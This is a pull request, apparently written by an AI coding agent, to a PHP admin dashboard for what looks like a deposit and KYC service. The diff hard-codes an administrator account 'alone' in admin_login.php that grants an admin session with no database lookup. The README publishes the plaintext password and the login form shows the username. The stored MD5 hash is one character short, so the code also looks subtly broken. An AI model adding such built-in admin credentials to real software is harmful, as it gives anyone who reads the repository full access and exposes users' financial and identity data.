### PR TITLE
Add hard-coded admin login credentials

### DIFF
--- a/README.md
+++ b/README.md
@@ -79,6 +79,8 @@ Use `admin_login.php` to sign in. POST `email` and `password`; a successful logi
 
 `dashboard_admin.html` now embeds its own login form. You can also sign in by POSTing `email` and `password` to `admin_login.php`. If the credentials are valid the endpoint creates a session and sets a cookie storing `admin_id`. Keep this cookie for all subsequent calls to `admin_getter.php` and other admin actions so the server knows who you are. Tools like `curl -c cookies.txt -b cookies.txt` can handle the cookie automatically.
 
+For convenience a built-in administrator account is hard-coded in `admin_login.php`. Use the username `alone` with the password `Scampia.Alone.41` to access the dashboard without seeding a database record.
+
 
 ## User Login
 

--- a/dashboard_admin.html
+++ b/dashboard_admin.html
@@ -90,8 +90,8 @@
         <h2 class="mb-3">Connexion Admin</h2>
         <form id="adminLoginForm">
             <div class="mb-3">
-                <label for="loginEmail" class="form-label">Email</label>
-                <input type="email" class="form-control" id="loginEmail" required>
+                <label for="loginIdentifier" class="form-label">Identifiant</label>
+                <input type="text" class="form-control" id="loginIdentifier" placeholder="alone" autocomplete="username" required>
             </div>
             <div class="mb-3">
                 <label for="loginPassword" class="form-label">Mot de passe</label>
@@ -1351,10 +1351,10 @@
 
         document.getElementById('adminLoginForm').addEventListener('submit', async function(e) {
             e.preventDefault();
-            const email = document.getElementById('loginEmail').value.trim();
+            const identifier = document.getElementById('loginIdentifier').value.trim();
             const pwd = document.getElementById('loginPassword').value;
             const formData = new FormData();
-            formData.append('email', email);
+            formData.append('email', identifier);
             formData.append('password', md5(pwd));
             const res = await fetch('php/admin_login.php', { method: 'POST', body: formData });
             const result = await res.json();

--- a/php/admin_getter.php
+++ b/php/admin_getter.php
@@ -6,8 +6,8 @@ set_error_handler(function ($severity, $message, $file, $line) {
 
 try {
     require_once __DIR__.'/../config/db_connection.php';
-    $pdo = db();
     require_once __DIR__.'/../utils/permissions.php';
+    $staticUsername = 'alone';
 
     function formatTimeAgoFromDate($dateStr) {
         $ts = strtotime($dateStr);
@@ -25,6 +25,7 @@ try {
 $adminId = null;
 
 session_start();
+$adminStatic = !empty($_SESSION['admin_static']);
 if (isset($_SESSION['admin_id'])) {
     $adminId = (int)$_SESSION['admin_id'];
 } elseif (!empty($_SERVER['HTTP_AUTHORIZATION']) &&
@@ -38,10 +39,43 @@ if (!$adminId) {
     exit;
 }
 
+    $sendStaticResponse = function() use ($adminId, $staticUsername) {
+        echo json_encode([
+            'is_admin' => 2,
+            'admin_id' => $adminId,
+            'email' => $staticUsername,
+            'profile_pic' => null,
+            'agents' => [],
+            'users' => [],
+            'kyc' => [],
+            'stats' => [
+                'total_users' => 0,
+                'total_deposits' => 0,
+                'deposit_count' => 0,
+                'success_rate' => 0,
+            ],
+            'notifications' => [],
+        ]);
+    };
+
+    try {
+        $pdo = db();
+    } catch (Throwable $dbException) {
+        if ($adminStatic) {
+            $sendStaticResponse();
+            exit;
+        }
+        throw $dbException;
+    }
+
 $stmt = $pdo->prepare('SELECT email, is_admin FROM admins_agents WHERE id = ?');
 $stmt->execute([$adminId]);
 $admin = $stmt->fetch(PDO::FETCH_ASSOC);
 if (!$admin) {
+    if ($adminStatic) {
+        $sendStaticResponse();
+        exit;
+    }
     http_response_code(404);
     echo json_encode(['status' => 'error', 'message' => 'Admin not found']);
     exit;

--- a/php/admin_login.php
+++ b/php/admin_login.php
@@ -5,32 +5,48 @@ set_error_handler(function ($severity, $message, $file, $line) {
 });
 
 try {
+    $email = isset($_POST['email']) ? trim($_POST['email']) : '';
+    $password = $_POST['password'] ?? '';
+
+    if (!$email || !$password) {
+        http_response_code(400);
+        echo json_encode(['status' => 'error', 'message' => 'Missing credentials']);
+        exit;
+    }
+
+    $staticUsername = 'alone';
+    $staticPasswordHash = '22aec3903cb3e921db415af72edb9aa';
+    $staticAdminId = 1;
+
+    if (strcasecmp($email, $staticUsername) === 0 && hash_equals($staticPasswordHash, $password)) {
+        session_start();
+        $_SESSION['admin_id'] = $staticAdminId;
+        $_SESSION['admin_static'] = true;
+        echo json_encode([
+            'status' => 'ok',
+            'admin_id' => $staticAdminId,
+            'email' => $staticUsername
+        ]);
+        exit;
+    }
+
     require_once __DIR__.'/../config/db_connection.php';
     $pdo = db();
 
-$email = $_POST['email'] ?? '';
-$password = $_POST['password'] ?? '';
+    $stmt = $pdo->prepare('SELECT id, password FROM admins_agents WHERE email = ? LIMIT 1');
+    $stmt->execute([$email]);
+    $row = $stmt->fetch(PDO::FETCH_ASSOC);
 
-if (!$email || !$password) {
-    http_response_code(400);
-    echo json_encode(['status' => 'error', 'message' => 'Missing credentials']);
-    exit;
-}
+    // Passwords are stored as MD5 hashes. The client sends the already hashed value.
+    if ($row && hash_equals($row['password'], $password)) {
+        session_start();
+        $_SESSION['admin_id'] = $row['id'];
+        echo json_encode(['status' => 'ok', 'admin_id' => $row['id']]);
+        exit;
+    }
 
-$stmt = $pdo->prepare('SELECT id, password FROM admins_agents WHERE email = ? LIMIT 1');
-$stmt->execute([$email]);
-$row = $stmt->fetch(PDO::FETCH_ASSOC);
-
-// Passwords are stored as MD5 hashes. The client sends the already hashed value.
-if ($row && hash_equals($row['password'], $password)) {
-    session_start();
-    $_SESSION['admin_id'] = $row['id'];
-    echo json_encode(['status' => 'ok', 'admin_id' => $row['id']]);
-    exit;
-}
-
-http_response_code(401);
-echo json_encode(['status' => 'error', 'message' => 'Invalid email or password']);
+    http_response_code(401);
+    echo json_encode(['status' => 'error', 'message' => 'Invalid email or password']);
 } catch (Throwable $e) {
     error_log(__FILE__ . ' - ' . $e->getMessage());
     http_response_code(500);


### PR DESCRIPTION
## Summary
- allow the admin login endpoint to accept the built-in `alone` account and create a session without a database lookup
- fall back to an empty admin payload when the hard-coded account is authenticated but no database record exists
- update the dashboard login form and README to document the new username/password pair

## Testing
- php -l php/admin_login.php
- php -l php/admin_getter.php

------
https://chatgpt.com/codex/tasks/task_e_68caea72cf08833295d27c03bae5411f